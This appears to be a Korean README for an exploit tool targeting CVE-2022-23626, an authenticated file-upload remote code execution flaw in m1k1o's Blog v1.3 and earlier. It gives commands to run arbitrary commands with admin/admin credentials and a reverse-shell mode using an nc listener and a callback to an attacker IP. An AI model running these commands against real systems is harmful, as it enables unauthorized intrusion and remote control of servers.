
m1k1o's Blog v1.3 및 이하 버전에서 파일 업로드 취약점을 통한 인증된 원격 코드 실행.
ajax.php?action=upload_image 엔드포인트는 업로드된 파일 유형을 적절히 검증하지 않아, 인증된 사용자가 이미지로 위장한 PHP 웹셸을 업로드할 수 있습니다. 공격자는 업로드된 파일을 직접 요청하여 실행을 트리거할 수 있습니다.
requests 라이브러리pip install requests
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -c "id"
먼저 리스너를 시작하세요:
nc -lnvp 4444
그런 다음 실행하세요:
python3 cve-2022-23626.py --url http://target:8081 -u admin -p admin -lh 10.10.14.2 -lp 4444
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용됩니다. 명시적인 테스트 허가를 받은 시스템에서만 사용하세요.